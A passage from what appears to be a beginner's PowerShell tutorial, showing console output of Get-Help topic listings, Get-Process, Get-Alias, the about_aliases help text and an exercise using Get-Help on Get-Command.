item in a Windows PowerShell provider namespace.\nCopy-Item Cmdlet Copies an item from one location to another within a namespace.\nClear-Item Cmdlet Deletes the contents of an item, but does not delete the item.\nInvoke-Item Cmdlet Performs the default action on the specified item.\nGet-PSProvider Cmdlet Gets information about the specified Windows PowerShell provider.\nNew-ItemProperty Cmdlet Creates a new property for an item and sets its value. For example, you ...\nSplit-Path Cmdlet Returns the specified part of a path.\nTest-Path Cmdlet Determines whether all elements of a path exist.\nGet-Process Cmdlet Gets the processes that are running on the local computer or a remote co...\nStop-Process Cmdlet Stops one or more running processes.\nWait-Process Cmdlet Waits for the processes to be stopped before accepting more input.\nDebug-Process Cmdlet Debugs one or more processes running on the local computer.\nStart-Process Cmdlet Starts one or more processes on the local computer.\nRemove-ItemProperty Cmdlet Deletes the property and its value from an item.\nRemove-WmiObject Cmdlet Deletes an instance of an existing Windows Management Instrumentation (W...\nRename-ItemProperty Cmdlet Renames a property of an item.\nRegister-WmiEvent Cmdlet Subscribes to a Windows Management Instrumentation (WMI) event.\nResolve-Path Cmdlet Resolves the wildcard characters in a path, and displays the path contents.\nGet-Service Cmdlet Gets the services on a local or remote computer.\nStop-Service Cmdlet Stops one or more running services.\nStart-Service Cmdlet Starts one or more stopped services.\nSuspend-Service Cmdlet Suspends (pauses) one or more running services.\nResume-Service Cmdlet Resumes one or more suspended (paused) services.\nRestart-Service Cmdlet Stops and then starts one or more services.\nSet-Service Cmdlet Starts, stops, and suspends a service, and changes its properties.\nNew-Service Cmdlet Creates a new Windows service.\nSet-Content Cmdlet Writes or replaces the content in an item with new content.\nSet-ItemProperty Cmdlet Creates or changes the value of a property of an item.\nSet-WmiInstance Cmdlet Creates or updates an instance of an existing Windows Management Instrum...\nGet-Transaction Cmdlet Gets the current (active) transaction.\nStart-Transaction Cmdlet Starts a transaction.\nComplete-Transaction Cmdlet Commits the active transaction.\nUndo-Transaction Cmdlet Rolls back the active transaction.\nUse-Transaction Cmdlet Adds the script block to the active transaction.\nNew-WebServiceProxy Cmdlet Creates a Web service proxy object that lets you use and manage the Web ...\nGet-HotFix Cmdlet Gets the hotfixes that have been applied to the local and remote computers.\nTest-Connection Cmdlet Sends ICMP echo request packets (\"pings\") to one or more computers.\nEnable-ComputerRestore Cmdlet Enables the System Restore feature on the specified file system drive.\nDisable-ComputerRestore Cmdlet Disables the System Restore feature on the specified file system drive.\nCheckpoint-Computer Cmdlet Creates a system restore point on the local computer.\nGet-ComputerRestorePoint Cmdlet Gets the restore points on the local computer.\nRestart-Computer Cmdlet Restarts (\"reboots\") the operating system on local and remote computers.\nStop-Computer Cmdlet Stops (shuts down) local and remote computers.\nRestore-Computer Cmdlet Starts a system restore on the local computer.\nAdd-Computer Cmdlet Add the local computer to a domain or workgroup.\nRemove-Computer Cmdlet Remove the local computer from a workgroup or domain.\nTest-ComputerSecureChannel Cmdlet Tests and repairs the secure channel between the local computer and its ...\nReset-ComputerMachinePassword Cmdlet Resets the machine account password for the computer.\nGet-Acl Cmdlet Gets the security descriptor for a resource, such as a file or registry ...\nSet-Acl Cmdlet Changes the security descriptor of a specified resource, such as a file ...\nGet-PfxCertificate Cmdlet Gets information about .pfx certificate files on the computer.\nGet-Credential Cmdlet Gets a credential object based on a user name and password.\nGet-ExecutionPolicy Cmdlet Gets the execution policies for the current session.\nSet-ExecutionPolicy Cmdlet Changes the user preference for the Windows PowerShell execution policy.\nGet-AuthenticodeSignature Cmdlet Gets information about the Authenticode signature in a file.\nSet-AuthenticodeSignature Cmdlet Adds an Authenticode signature to a Windows PowerShell script or other f...\nConvertFrom-SecureString Cmdlet Converts a secure string into an encrypted standard string.\nConvertTo-SecureString Cmdlet Converts encrypted standard strings to secure strings. It can also conve...\nWSMan Provider Provides access to Web Services for Management (WS-Management) configura...\nAlias Provider Provides access to the Windows PowerShell aliases and the values that th...\nEnvironment Provider Provides access to the Windows environment variables.\nFileSystem Provider Provides access to files and directories.\nFunction Provider Provides access to the functions defined in Windows PowerShell.\nRegistry Provider Provides access to the system registry keys and values from Windows Powe...\nVariable Provider Provides access to the Windows PowerShell variables and to their values.\nCertificate Provider Provides access to X.509 certificate stores and certificates from within...\nabout_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows\nabout_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell.\nabout_arrays HelpFile Describes a compact data structure for storing data elements.\nabout_Assignment_Operators HelpFile Describes how to use operators to assign values to variables.\nabout_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell.\nabout_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While,\nabout_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.\nabout_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.\nabout_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts.\nabout_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet.\nabout_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell.\nabout_Continue HelpFile Describes how the Continue statement immediately returns the program flow\nabout_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell\nabout_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only\nabout_debuggers HelpFile Describes the Windows PowerShell debugger.\nabout_do HelpFile Runs a statement list one or more times, subject to a While or Until\nabout_environment_variables HelpFile Describes how to access Windows environment variables in Windows\nabout_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains\nabout_eventlogs HelpFile Windows PowerShell creates a Windows event log that is\nabout_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains\nabout_For HelpFile Describes a language command you can use to run statements based on a\nabout_Foreach HelpFile Describes a language command you can use to traverse all the items in a\nabout_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display\nabout_functions HelpFile Describes how to create and use functions in Windows PowerShell.\nabout_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets.\nabout_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use\nabout_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare\nabout_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a\nabout_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell.\nabout_History HelpFile Describes how to retrieve and run commands in the command history.\nabout_If HelpFile Describes a language command you can use to run statement lists based\nabout_jobs HelpFile Provides information about how Windows PowerShell background jobs run a\nabout_job_details HelpFile Provides details about background jobs on local and remote computers.\nabout_join HelpFile Describes how the join operator (-join) combines multiple strings into a\nabout_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language.\nabout_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt.\nabout_locations HelpFile Describes how to access items from the working location in Windows\nabout_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell.\nabout_methods HelpFile Describes how to use methods to perform actions on objects in Windows\nabout_modules HelpFile Explains how to install, import, and use Windows PowerShell modules.\nabout_objects HelpFile Provides essential information about objects in Windows PowerShell.\nabout_operators HelpFile Describes the operators that are supported by Windows PowerShell.\nabout_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell.\nabout_Parsing HelpFile Describes how Windows PowerShell parses commands.\nabout_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell.\nabout_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell\nabout_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell\nabout_profiles HelpFile Describes how to create and use a Windows PowerShell profile.\nabout_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom\nabout_properties HelpFile Describes how to use object properties in Windows PowerShell.\nabout_providers HelpFile Describes how Windows PowerShell providers provide access to data and\nabout_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to\nabout_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the\nabout_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them.\nabout_Quoting_Rules HelpFile Describes rules for using single and double quotation marks\nabout_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files.\nabout_Ref HelpFile Describes how to create and use a reference variable type.\nabout_regular_expressions HelpFile Describes regular expressions in Windows PowerShell.\nabout_remote HelpFile Describes how to run remote commands in Windows PowerShell.\nabout_remote_FAQ HelpFile Contains questions and answers about running remote commands\nabout_remote_jobs HelpFile Describes how to run background jobs on remote computers.\nabout_remote_output HelpFile Describes how to interpret and format the output of remote commands.\nabout_remote_requirements HelpFile Describes the system requirements and configuration requirements for\nabout_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell.\nabout_requires HelpFile Prevents a script from running by requiring the specified snap-ins and\nabout_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they\nabout_Return HelpFile Exits the current scope, which can be a function, script, or script block.\nabout_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set\nabout_scripts HelpFile Describes how to write and run scripts in Windows PowerShell.\nabout_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in\nabout_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell...\nabout_Session_Configurations HelpFile Describes session configurations, which determine the users who can\nabout_Signing HelpFile Explains to how sign scripts so that they comply with the Windows\nabout_Special_Characters HelpFile Describes the special characters that you can use to control how\nabout_split HelpFile Explains how to use the split operator to split one or more strings into\nabout_Switch HelpFile Explains how to use a switch to handle multiple If statements.\nabout_Throw HelpFile Describes the Throw keyword, which generates a terminating error.\nabout_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell.\nabout_trap HelpFile Describes a keyword that handles a terminating error.\nabout_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle\nabout_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET\nabout_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types.\nabout_Variables HelpFile Describes how variables store values that can be used in Windows\nabout_While HelpFile Describes a language statement that you can use to run a command block\nabout_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell.\nabout_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0.\nabout_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell\nabout_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation\nabout_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as\ndefault HelpFile Displays help about Windows PowerShell cmdlets and concepts.\n\n\nPS C:\\>\n```\n\n- Get all ```powershell``` help topics for ```process```\n\n```Powershell\nPS C:\\> Get-Help *process\n\nName Category Synopsis\n---- -------- --------\nGet-Process Cmdlet Gets the processes that are running on the local computer or a remote co...\nStop-Process Cmdlet Stops one or more running processes.\nWait-Process Cmdlet Waits for the processes to be stopped before accepting more input.\nDebug-Process Cmdlet Debugs one or more processes running on the local computer.\nStart-Process Cmdlet Starts one or more processes on the local computer.\n\n\nPS C:\\>\n```\n\n- ```Get-Process``` Cmdlet\n\n```Powershell\nPS C:\\> Get-Process\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 109 5 14812 9284 43 996 audiodg\n 52 3 1600 4688 46 0.44 2588 conhost\n 452 5 1092 2584 33 344 csrss\n 178 6 1080 3124 31 400 csrss\n 68 4 964 3080 39 0.03 300 dwm\n 695 21 23220 25500 166 1.38 356 explorer\n 0 0 0 12 0 0 Idle\n 41 3 1672 2980 53 0.00 332 jusched\n 756 13 2860 7264 35 492 lsass\n 144 4 1048 2540 14 500 lsm\n 75 4 1312 3752 31 3528 mscorsvw\n 413 10 81340 81328 218 1.83 2580 powershell\n 576 13 11580 5804 80 1180 SearchIndexer\n 217 7 4004 5388 35 484 services\n 29 1 212 628 4 268 smss\n 285 10 4468 6516 58 1332 spoolsv\n 140 4 1768 3728 28 1516 sppsvc\n 353 7 2460 5292 34 608 svchost\n 276 8 1996 4380 26 720 svchost\n 561 13 14644 12140 77 772 svchost\n 529 13 22324 29264 100 892 svchost\n 1239 35 20608 23608 127 932 svchost\n 498 17 5776 9092 50 1100 svchost\n 378 13 7728 8008 55 1228 svchost\n 318 25 8292 8060 47 1368 svchost\n 344 15 4952 8300 67 1460 svchost\n 96 7 1068 3392 25 1820 svchost\n 71 4 964 3560 22 2056 svchost\n 349 37 7504 8204 63 2364 svchost\n 400 34 143888 48300 208 3556 svchost\n 592 0 44 1416 3 4 System\n 146 8 2120 4372 40 0.03 2028 taskhost\n 327 10 8012 14516 82 3944 TrustedInstaller\n 115 5 1444 3524 45 668 VBoxService\n 139 6 1328 4308 62 0.04 1612 VBoxTray\n 123 5 1416 4744 28 2348 VSSVC\n 74 5 808 2904 32 392 wininit\n 111 4 1524 3668 39 440 winlogon\n 113 4 1712 3952 26 2524 WmiPrvSE\n 172 6 3152 6856 37 3820 WmiPrvSE\n 428 15 7364 14860 108 2088 wmpnetwk\n 98 5 1356 4680 45 4048 WuSetupV\n\n\nPS C:\\>\n```\n\n- Get all ```powershell``` help topics for ```alias```\n\n```Powershell\nPS C:\\> Get-Help *alias*\n\nName Category Synopsis\n---- -------- --------\nExport-Alias Cmdlet Exports information about currently defined aliases to a file.\nGet-Alias Cmdlet Gets the aliases for the current session.\nImport-Alias Cmdlet Imports an alias list from a file.\nNew-Alias Cmdlet Creates a new alias.\nSet-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...\nAlias Provider Provides access to the Windows PowerShell aliases and the values that th...\nabout_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows\n\n\nPS C:\\>\n```\n\n- ```Get-Alias``` Cmdlet\n\n```Powershell\nPS C:\\> Get-Alias\n\nCommandType Name Definition\n----------- ---- ----------\nAlias % ForEach-Object\nAlias ? Where-Object\nAlias ac Add-Content\nAlias asnp Add-PSSnapIn\nAlias cat Get-Content\nAlias cd Set-Location\nAlias chdir Set-Location\nAlias clc Clear-Content\nAlias clear Clear-Host\nAlias clhy Clear-History\nAlias cli Clear-Item\nAlias clp Clear-ItemProperty\nAlias cls Clear-Host\nAlias clv Clear-Variable\nAlias compare Compare-Object\nAlias copy Copy-Item\nAlias cp Copy-Item\nAlias cpi Copy-Item\nAlias cpp Copy-ItemProperty\nAlias cvpa Convert-Path\nAlias dbp Disable-PSBreakpoint\nAlias del Remove-Item\nAlias diff Compare-Object\nAlias dir Get-ChildItem\nAlias ebp Enable-PSBreakpoint\nAlias echo Write-Output\nAlias epal Export-Alias\nAlias epcsv Export-Csv\nAlias epsn Export-PSSession\nAlias erase Remove-Item\nAlias etsn Enter-PSSession\nAlias exsn Exit-PSSession\nAlias fc Format-Custom\nAlias fl Format-List\nAlias foreach ForEach-Object\nAlias ft Format-Table\nAlias fw Format-Wide\nAlias gal Get-Alias\nAlias gbp Get-PSBreakpoint\nAlias gc Get-Content\nAlias gci Get-ChildItem\nAlias gcm Get-Command\nAlias gcs Get-PSCallStack\nAlias gdr Get-PSDrive\nAlias ghy Get-History\nAlias gi Get-Item\nAlias gjb Get-Job\nAlias gl Get-Location\nAlias gm Get-Member\nAlias gmo Get-Module\nAlias gp Get-ItemProperty\nAlias gps Get-Process\nAlias group Group-Object\nAlias gsn Get-PSSession\nAlias gsnp Get-PSSnapIn\nAlias gsv Get-Service\nAlias gu Get-Unique\nAlias gv Get-Variable\nAlias gwmi Get-WmiObject\nAlias h Get-History\nAlias history Get-History\nAlias icm Invoke-Command\nAlias iex Invoke-Expression\nAlias ihy Invoke-History\nAlias ii Invoke-Item\nAlias ipal Import-Alias\nAlias ipcsv Import-Csv\nAlias ipmo Import-Module\nAlias ipsn Import-PSSession\nAlias ise powershell_ise.exe\nAlias iwmi Invoke-WMIMethod\nAlias kill Stop-Process\nAlias lp Out-Printer\nAlias ls Get-ChildItem\nAlias man help\nAlias md mkdir\nAlias measure Measure-Object\nAlias mi Move-Item\nAlias mount New-PSDrive\nAlias move Move-Item\nAlias mp Move-ItemProperty\nAlias mv Move-Item\nAlias nal New-Alias\nAlias ndr New-PSDrive\nAlias ni New-Item\nAlias nmo New-Module\nAlias nsn New-PSSession\nAlias nv New-Variable\nAlias ogv Out-GridView\nAlias oh Out-Host\nAlias popd Pop-Location\nAlias ps Get-Process\nAlias pushd Push-Location\nAlias pwd Get-Location\nAlias r Invoke-History\nAlias rbp Remove-PSBreakpoint\nAlias rcjb Receive-Job\nAlias rd Remove-Item\nAlias rdr Remove-PSDrive\nAlias ren Rename-Item\nAlias ri Remove-Item\nAlias rjb Remove-Job\nAlias rm Remove-Item\nAlias rmdir Remove-Item\nAlias rmo Remove-Module\nAlias rni Rename-Item\nAlias rnp Rename-ItemProperty\nAlias rp Remove-ItemProperty\nAlias rsn Remove-PSSession\nAlias rsnp Remove-PSSnapin\nAlias rv Remove-Variable\nAlias rvpa Resolve-Path\nAlias rwmi Remove-WMIObject\nAlias sajb Start-Job\nAlias sal Set-Alias\nAlias saps Start-Process\nAlias sasv Start-Service\nAlias sbp Set-PSBreakpoint\nAlias sc Set-Content\nAlias select Select-Object\nAlias set Set-Variable\nAlias si Set-Item\nAlias sl Set-Location\nAlias sleep Start-Sleep\nAlias sort Sort-Object\nAlias sp Set-ItemProperty\nAlias spjb Stop-Job\nAlias spps Stop-Process\nAlias spsv Stop-Service\nAlias start Start-Process\nAlias sv Set-Variable\nAlias swmi Set-WMIInstance\nAlias tee Tee-Object\nAlias type Get-Content\nAlias where Where-Object\nAlias wjb Wait-Job\nAlias write Write-Output\n\n\nPS C:\\>\n```\n\n- Examples of ```Get-Help```\n\n```Powershell\nPS C:\\> Get-Help Get-Help -Examples\n\nNAME\n Get-Help\n\nSYNOPSIS\n Displays information about Windows PowerShell commands and concepts.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>get-help\n\n\n Description\n -----------\n This command displays help about the Windows PowerShell help system.\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>get-help *\n\n\n Description\n -----------\n This command displays a list of all help files in the Windows PowerShell help system.\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n C:\\PS>get-help get-alias\n\n C:\\PS>help get-alias\n\n C:\\PS>get-alias -?\n\n\n Description\n -----------\n These commands display basic information about the get-alias cmdlet. The \"Get-Help\" and \"-?\" commands display the i\n nformation on a single page. The \"Help\" command displays the information one page at a time.\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n C:\\PS>get-help about_*\n\n\n Description\n -----------\n This command displays a list of the conceptual topics included in Windows PowerShell help. All of these topics begi\n n with the characters \"about_\". To display a particular help file, type \"get-help , for example, \"get-h\n elp about_signing\".\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n C:\\PS>get-help ls -detailed\n\n\n Description\n -----------\n This command displays detailed help for the Get-ChildItem cmdlet by specifying one of its aliases, \"ls.\" The Detail\n ed parameter requests the detailed view of the help file, which includes parameter descriptions and examples. To se\n e the complete help file for a cmdlet, use the Full parameter.\n\n\n\n\n -------------------------- EXAMPLE 6 --------------------------\n\n C:\\PS>get-help format-string -full\n\n\n Description\n -----------\n This command displays the full view help for the Format-String cmdlet. The full view of help includes parameter des\n criptions, examples, and a table of technical details about the parameters.\n\n\n\n\n -------------------------- EXAMPLE 7 --------------------------\n\n C:\\PS>get-help start-service -examples\n\n\n Description\n -----------\n This command displays examples of using start-service in Windows PowerShell commands.\n\n\n\n\n -------------------------- EXAMPLE 8 --------------------------\n\n C:\\PS>get-help get-childitem -parameter f*\n\n\n Description\n -----------\n This command displays descriptions of the parameters of the Get-ChildItem cmdlet that begin with \"f\" (filter and fo\n rce). For descriptions of all parameters, type \"get-help get-childitem parameter*\".\n\n\n\n\n -------------------------- EXAMPLE 9 --------------------------\n\n C:\\PS>(get-help write-output).syntax\n\n\n Description\n -----------\n This command displays only the syntax of the Write-Output cmdlet.\n\n Syntax is one of many properties of help objects; others are description, details, examples, and parameters. To fin\n d all properties and methods of help objects, type \"get-help | get-member\"; for example, \"get-help st\n art-service | get member\".\n\n\n\n\n -------------------------- EXAMPLE 10 --------------------------\n\n C:\\PS>(get-help trace-command).alertset\n\n\n Description\n -----------\n This command displays the notes about the cmdlet. The notes are stored in the alertSet property of the help object.\n\n The notes include conceptual information and tips for using the cmdlet. By default, the notes are displayed only wh\n en you use the Full parameter of Get-Help, but you can also display them by using the alertSet property.\n\n\n\n\n -------------------------- EXAMPLE 11 --------------------------\n\n C:\\PS>get-help add-member -full | out-string -stream | select-string -pattern clixml\n\n\n Description\n -----------\n This example shows how to search for a word in particular cmdlet help topic. This command searches for the word \"cl\n ixml\" in the full version of the help topic for the Add-Member cmdlet.\n\n Because the Get-Help cmdlet generates a MamlCommandHelpInfo object, not a string, you need to use a command that tr\n ansforms the help topic content into a string, such as Out-String or Out-File.\n\n\n\n\n -------------------------- EXAMPLE 12 --------------------------\n\n C:\\PS>get-help get-member -online\n\n\n Description\n -----------\n This command displays the online version of the help topic for the Get-Member cmdlet.\n\n\n\n\n -------------------------- EXAMPLE 13 --------------------------\n\n C:\\PS>get-help remoting\n\n\n Description\n -----------\n This command displays a list of topics that include the word \"remoting\" in their contents.\n\n When you enter a word that does not appear in any topic title, Get-Help displays a list of topics that include that\n word.\n\n\n\n\n -------------------------- EXAMPLE 14 --------------------------\n\n C:\\PS>get-help get-item -path SQLSERVER:\\DataCollection\n\n NAME\n Get-Item\n\n SYNOPSIS\n Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve\n r PowerShell connection.\n ...\n\n C:\\PS> cd SQLSERVER:\\DataCollection\n C:\\PS> SQLSERVER:\\DataCollection> get-help get-item\n\n\n NAME\n Get-Item\n\n SYNOPSIS\n Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve\n r PowerShell connection.\n ...\n\n\n C:\\PS> Get-Item\n\n NAME\n Get-Item\n\n SYNOPSIS\n Gets the item at the specified location.\n\n ...\n\n\n Description\n -----------\n This example shows how to get help for the Get-Item cmdlet that explains how to use the cmdlet in the DataCollectio\n n node of the Windows PowerShell SQL Server provider.\n\n The example shows two ways of getting the custom help for Get-Item.\n\n The first command uses the Path parameter of Get-Help to specify the provider path. This command can be entered at\n any path location.\n\n The second command uses the Set-Location cmdlet (alias = \"cd\") to go to the provider path. From that location, even\n without the Path parameter, the Get-Help command gets the custom help for the provider path.\n\n The third command shows that a Get-Help command in a file system path, and without the Path parameter, gets the sta\n ndard help for the Get-Item cmdlet.\n\n\n\n\n -------------------------- EXAMPLE 15 --------------------------\n\n C:\\PS>get-help c:\\ps-test\\MyScript.ps1\n\n\n Description\n -----------\n This command gets help for the MyScript.ps1 script. For information about writing help for your functions and scrip\n ts, see about_Comment_Based_Help.\n\nPS C:\\>\n```\n\n- Get all ```powershell``` help topics for ```alias```\n\n```Powershell\nPS C:\\> Get-Help *alias*\n\nName Category Synopsis\n---- -------- --------\nExport-Alias Cmdlet Exports information about currently defined aliases to a file.\nGet-Alias Cmdlet Gets the aliases for the current session.\nImport-Alias Cmdlet Imports an alias list from a file.\nNew-Alias Cmdlet Creates a new alias.\nSet-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...\nAlias Provider Provides access to the Windows PowerShell aliases and the values that th...\nabout_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows\n\n\nPS C:\\>\n```\n\n- Getting help for ```about_aliases```\n\n```Powershell\nPS C:\\> Get-Help about_aliases\nTOPIC\n about_aliases\n\nSHORT DESCRIPTION\n Describes how to use alternate names for cmdlets and commands in Windows\n PowerShell.\n\nLONG DESCRIPTION\n An alias is an alternate name or nickname for a cmdlet or for a command\n element, such as a function, script, file, or executable file. You\n can use the alias instead of the command name in any Windows PowerShell\n commands.\n\n To create an alias, use the New-Alias cmdlet. For example, the following\n command creates the \"gas\" alias for the Get-AuthenticodeSignature cmdlet:\n\n new-alias -name gas -value Get-AuthenticodeSignature\n\n After you create the alias for the cmdlet name, you can use the alias\n instead of the cmdlet name. For example, to get the Authenticode signature\n for the SqlScript.ps1 file, type:\n\n get-authenticodesignature sqlscript.ps1\n\n Or, type:\n\n gas sqlscript.ps1\n\n\n If you create \"word\" as the alias for Microsoft Office Word, you can type\n \"word\" instead of the following:\n\n\n \"c:\\program files\\microsoft office\\office11\\winword.exe\"\n\nBUILT-IN ALIASES\n Windows PowerShell includes a set of built-in aliases, including \"cd\" and\n \"chdir\" for the Set-Location cmdlet, and \"ls\" and \"dir\" for the\n Get-ChildItem cmdlet.\n\n To get all the aliases on the computer, including the built-in aliases,\n type:\n\n get-alias\n\nALIAS CMDLETS\n Windows PowerShell includes the following cmdlets, which are designed for\n working with aliases:\n\n - Get-Alias. Gets all the aliases in the current session.\n - New-Alias. Creates a new alias.\n - Set-Alias. Creates or changes an alias.\n - Export-Alias. Exports one or more aliases to a file.\n - Import-Alias. Imports an alias file into Windows PowerShell.\n\n For detailed information about the cmdlets, type:\n\n get-help -detailed\n\n For example, type:\n\n get-help export-alias -detailed\n\nCREATING AN ALIAS\n To create a new alias, use the New-Alias cmdlet. For example, to create the\n \"gh\" alias for Get-Help, type:\n\n new-alias -name gh -value get-help\n\n You can use the alias in commands, just as you would use the full cmdlet\n name, and you can use the alias with parameters.\n\n For example, to get detailed Help for the Get-WmiObject cmdlet, type:\n\n get-help get-wmiobject -detailed\n\n Or, type:\n\n gh get-wmiobject -detailed\n\nSAVING ALIASES\n The aliases that you create are saved only in the current session. To use\n the aliases in a different session, add the alias to your Windows\n PowerShell profile. Or, use the Export-Alias cmdlet to save the aliases to\n a file.\n\n For more information, type:\n\n get-help about_profile\n\nGETTING ALIASES\n To get all the aliases in the current session, including the built-in\n aliases, the aliases in your Windows PowerShell profiles, and the aliases\n that you have created in the current session, type:\n\n get-alias\n\n To get particular aliases, use the Name parameter of the Get-Alias cmdlet.\n For example, to get aliases that begin with \"p\", type:\n\n get-alias -name p*\n\n To get the aliases for a particular item, use the Definition parameter.\n For example, to get the aliases for the Get-ChildItem cmdlet type:\n\n get-alias -definition Get-ChildItem\n\n\nALTERNATE NAMES FOR COMMANDS WITH PARAMETERS\n You can assign an alias to a cmdlet, script, function, or executable file.\n However, you cannot assign an alias to a command and its parameters.\n For example, you can assign an alias to the Get-EventLog cmdlet, but you\n cannot assign an alias to the \"get-eventlog -logname system\" command.\n\n However, you can create a function that includes the command. To create a\n function, type the word \"function\" followed by a name for the function.\n Type the command, and enclose it in braces ({}).\n\n For example, the following command creates the syslog function. This\n function represents the \"get-eventlog -logname system\" command:\n\n function syslog {get-eventlog -logname system}\n\n You can now type \"syslog\" instead of the command. And, you can create\n aliases for the syslog function.\n\n For more information about functions, type:\n\n get-help about_functions\n\nALIAS OBJECTS\n Windows PowerShell aliases are represented by objects that are instances\n of the System.Management.Automation.AliasInfo class. For more information\n about this type of object, see \"AliasInfo Class\" in the Microsoft\n Developer Network (MSDN) library at\n http://go.microsoft.com/fwlink/?LinkId=143644.\n\n To view the properties and methods of the alias objects, get the\n aliases. Then, pipe them to the Get-Member cmdlet. For example:\n\n get-alias | get-member\n\n To view the values of the properties of a specific alias, such as the\n \"dir\" alias, get the alias. Then, pipe it to the Format-List cmdlet. For\n example, the following command gets the \"dir\" alias. Next, the command\n pipes the alias to the Format-List cmdlet. Then, the command uses the\n Property parameter of Format-List with a wildcard character (*) to display\n all the properties of the \"dir\" alias. The following command performs\n these tasks:\n\n get-alias -name dir | format-list -property *\n\nWINDOWS POWERSHELL ALIAS PROVIDER\n Windows PowerShell includes the Alias provider. The Alias provider lets you\n view the aliases in Windows PowerShell as though they were on a file system\n drive.\n\n The Alias provider exposes the Alias: drive. To go into the Alias: drive,\n type:\n\n set-location alias:\n\n To view the contents of the drive, type:\n\n get-childitem\n\n To view the contents of the drive from another Windows PowerShell drive,\n begin the path with the drive name. Include the colon (:). For example:\n\n get-childitem -path alias:\n\n To get information about a particular alias, type the drive name and\n the alias name. Or, type a name pattern. For example, to get all the\n aliases that begin with \"p\", type:\n\n get-childitem -path alias:p*\n\n For more information about the Windows PowerShell Alias provider,\n type:\n\n get-help alias-psprovider\n\n\nSEE ALSO\n\n new-alias\n get-alias\n set-alias\n export-alias\n import-alias\n get-psprovider\n get-psdrive\n about_functions\n about_profiles\n about_providers\n\nPS C:\\>\n```\n\n###### Exercise\n\n- Use ```Get-Help``` to retrieve help about ```Get-Command```.\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Get-Command\n\nNAME\n Get-Command\n\nSYNOPSIS\n Gets basic information about cmdlets and other elements of Windows PowerShell commands.\n\n\nSYNTAX\n Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application |\n Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [\n ]\n\n Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot\n alCount ] []\n\n\nDESCRIPTION\n The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th\n e session, such as aliases, functions, filters, scripts, and applications.\n\n Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge\n ts its information from help topic files.\n\n Without parameters, \"Get-Command\" gets all of the cmdlets and functions in the current session. \"Get-Command *\" get\n s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en\n v:path). It groups the files in the \"Application\" command type.\n\n You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win\n dows PowerShell snap-in or importing a module.\n\n\nRELATED LINKS\n Online version: http://go.microsoft.com/fwlink/?LinkID=113309\n about_Command_Precedence\n Get-Help\n Get-PSDrive\n Get-Member\n Import-PSSession\n Export-PSSession\n\nREMARKS\n To see the examples, type: \"get-help Get-Command -examples\".\n For more information, type: \"get-help Get-Command -detailed\".\n For technical information, type: \"get-help Get-Command -full\".\n\n\n\nPS 